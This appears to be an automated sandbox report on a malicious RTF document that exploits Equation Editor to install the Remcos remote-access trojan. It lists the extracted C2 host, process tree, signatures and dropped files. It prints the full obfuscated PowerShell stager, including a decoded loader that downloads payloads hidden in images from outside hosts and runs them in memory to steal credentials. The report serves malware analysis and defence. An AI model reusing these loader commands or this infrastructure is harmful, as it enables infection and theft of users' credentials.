Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    14/03/2024, 02:41

General

  • Target

    a60f72316633a40d5ab45b035ecd03b7cd0162ce161946cfa2ad86d11fbc9c13.rtf

  • Size

    71KB

  • MD5

    65e41469da1397e3e1c9d70fc29fe2e2

  • SHA1

    b234d40cee175effca9a503c908b408a91c7a7da

  • SHA256

    a60f72316633a40d5ab45b035ecd03b7cd0162ce161946cfa2ad86d11fbc9c13

  • SHA512

    22a75d17446e8b6556a1fb3fdb1f8f4671d3f894a717541c7b51861f1c87c2bdd593b998762b37b1844c9028d9cd79510a0414d87c79f679266b519f44e75c56

  • SSDEEP

    768:W7LVB2IIi5W8rLUAvwqKfGJp8pgpyPjwf7thRrmrPNq4kZ9Y7U3gJnKxBwDwA:mj2IIWWuI4yeJp8pgoP47lmrAz3g2Bql

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

buike0147.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-1C7Y8W

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 23 IoCs
  • Detects executables built or packed with MPress PE compressor 24 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a60f72316633a40d5ab45b035ecd03b7cd0162ce161946cfa2ad86d11fbc9c13.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2248
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\beautifulldaykiss.vbs"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreMwDgTrevDgTreDcDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDkDgTreOQDgTrewDgTreDgDgTreMwDgTrexDgTreDYDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreMwDgTrevDgTreDcDgTreMQDgTre0DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDkDgTreOQDgTrewDgTreDgDgTreMwDgTre1DgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQwBDDgTreEEDgTreTQDgTrevDgTreDDgTreDgTreMDgTreDgTre3DgTreDUDgTreNDgTreDgTrevDgTreDcDgTreMDgTreDgTrexDgTreC4DgTreMwDgTre0DgTreDIDgTreLgDgTre1DgTreDgDgTreMQDgTreuDgTreDcDgTreNDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBNDgTreEEDgTreQwBDDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2788
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/753/713/original/new_image.jpg?1709908316', 'https://uploaddeimagens.com.br/images/004/753/714/original/new_image.jpg?1709908350'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CCAM/00754/701.342.581.741//:ptth' , '1' , 'C:\ProgramData\' , 'MACC','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1584
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\MACC.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:576
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:1188
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:1688
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybykltgmjumrykqdvtmuxhkd"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1592
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdlvmmyoxcediyehmezwiufujur"
                  6⤵
                  • Accesses Microsoft Outlook accounts
                  PID:1716
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\lyqnmwjhtkxilfalvouplzrdkjaxrz"
                  6⤵
                    PID:2700
                  • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                    C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\lyqnmwjhtkxilfalvouplzrdkjaxrz"
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2584

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          67KB

          MD5

          753df6889fd7410a2e9fe333da83a429

          SHA1

          3c425f16e8267186061dd48ac1c77c122962456e

          SHA256

          b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

          SHA512

          9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          18af88bdd186f548c7ffaae2eae5bc63

          SHA1

          69298f328ce97bf9f7a651149d7c8916743a7216

          SHA256

          175afcf02aad42aedf006bcbd122afd2678da1be1621302c43c627a60747a648

          SHA512

          e611003c4a4396622e828897136f7f0612730b79f79ebe332a8d5a738bd76e51c32af85fee1e756e9f98ecdcd1b15a43cf02c0b9794e9dabb3137838a050c378

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          11ac1260541b656d2cb0aa6f91823d92

          SHA1

          78d5783e6472442479ca70ca390d26d6cba4e28f

          SHA256

          65cf8f61d9e1add0d7cac9a07ed9083d053ecc2f1b122a863f40c605e2d15bdb

          SHA512

          e84cbd6a91d68b78decada2a0f787d8d2039baed3f66bfd07a0a76c69950f96603ea07a8e32fe36c7d76ede925fea5afed0b285802c7f9fe6cc48622eb04e743

        • C:\Users\Admin\AppData\Local\Temp\Cab1E3A.tmp

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Users\Admin\AppData\Local\Temp\Tar1E4D.tmp

          Filesize

          171KB

          MD5

          9c0c641c06238516f27941aa1166d427

          SHA1

          64cd549fb8cf014fcd9312aa7a5b023847b6c977

          SHA256

          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

          SHA512

          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

        • C:\Users\Admin\AppData\Local\Temp\Tar1FAA.tmp

          Filesize

          175KB

          MD5

          dd73cead4b93366cf3465c8cd32e2796

          SHA1

          74546226dfe9ceb8184651e920d1dbfb432b314e

          SHA256

          a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

          SHA512

          ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

        • C:\Users\Admin\AppData\Local\Temp\ybykltgmjumrykqdvtmuxhkd

          Filesize

          2B

          MD5

          f3b25701fe362ec84616a93a45ce9998

          SHA1

          d62636d8caec13f04e28442a0a6fa1afeb024bbb

          SHA256

          b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

          SHA512

          98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

        • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

          Filesize

          20KB

          MD5

          9bd4e04671f5fae29d9231b57925473c

          SHA1

          6198344970e668c13b805b6a207af43df9e2ae5d

          SHA256

          3fd46a2dca83ddee5fe2966f229c6ffdf41da2642bec2d45dd159f940743fce7

          SHA512

          211142d76b8922b80cebaf736c7f09494b545c7341bf5b7ba52bee1577102ed43d2131aa37125914665236e14641da4029d994239becd05a9db8863447c835c8

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          9caadab01b2c3bca067e935d6d3b80e4

          SHA1

          3f78c931245e735b699e1478b14413ebe08dc6ef

          SHA256

          03e2dd9d3459affefce708719bb40dc7789fe57458ec8771e9af8086f635427b

          SHA512

          42bc78068f0c2cd43de258dc16d98cc204bfd4625ca4e4f0db7592572dfef8a077cdb209c67a35da8b4fa5c218c537b076c3ecafd4f1fd2db6ad1817beef8656

        • C:\Users\Admin\AppData\Roaming\beautifulldaykiss.vbs

          Filesize

          3KB

          MD5

          abf0fe94801f2af6c35f70e5f5a05c0e

          SHA1

          856ce1fa8938605c153e91f75233e1ae060fdae2

          SHA256

          8bba1d1c67887d33bffbe2c4ed46226af284c75db270d1c484b714c368909b40

          SHA512

          a51fd44f84438c35494977073d61f4502ca1b179b794f84c2b458f0042c455cd974c487af33ef36cb1880cfee9bede57f74325dc5826087646e7bafc0bd4ae49

        • memory/576-126-0x000000006A680000-0x000000006AC2B000-memory.dmp

          Filesize

          5.7MB

        • memory/576-121-0x000000006A680000-0x000000006AC2B000-memory.dmp

          Filesize

          5.7MB

        • memory/576-165-0x000000006A680000-0x000000006AC2B000-memory.dmp

          Filesize

          5.7MB

        • memory/576-125-0x000000006A680000-0x000000006AC2B000-memory.dmp

          Filesize

          5.7MB

        • memory/576-122-0x0000000002960000-0x00000000029A0000-memory.dmp

          Filesize

          256KB

        • memory/1584-134-0x0000000002A00000-0x0000000002A40000-memory.dmp

          Filesize

          256KB

        • memory/1584-46-0x000000006A680000-0x000000006AC2B000-memory.dmp

          Filesize

          5.7MB

        • memory/1584-135-0x0000000002A00000-0x0000000002A40000-memory.dmp

          Filesize

          256KB

        • memory/1584-136-0x0000000002A00000-0x0000000002A40000-memory.dmp

          Filesize

          256KB

        • memory/1584-133-0x000000006A680000-0x000000006AC2B000-memory.dmp

          Filesize

          5.7MB

        • memory/1584-44-0x000000006A680000-0x000000006AC2B000-memory.dmp

          Filesize

          5.7MB

        • memory/1584-47-0x0000000002A00000-0x0000000002A40000-memory.dmp

          Filesize

          256KB

        • memory/1584-45-0x0000000002A00000-0x0000000002A40000-memory.dmp

          Filesize

          256KB

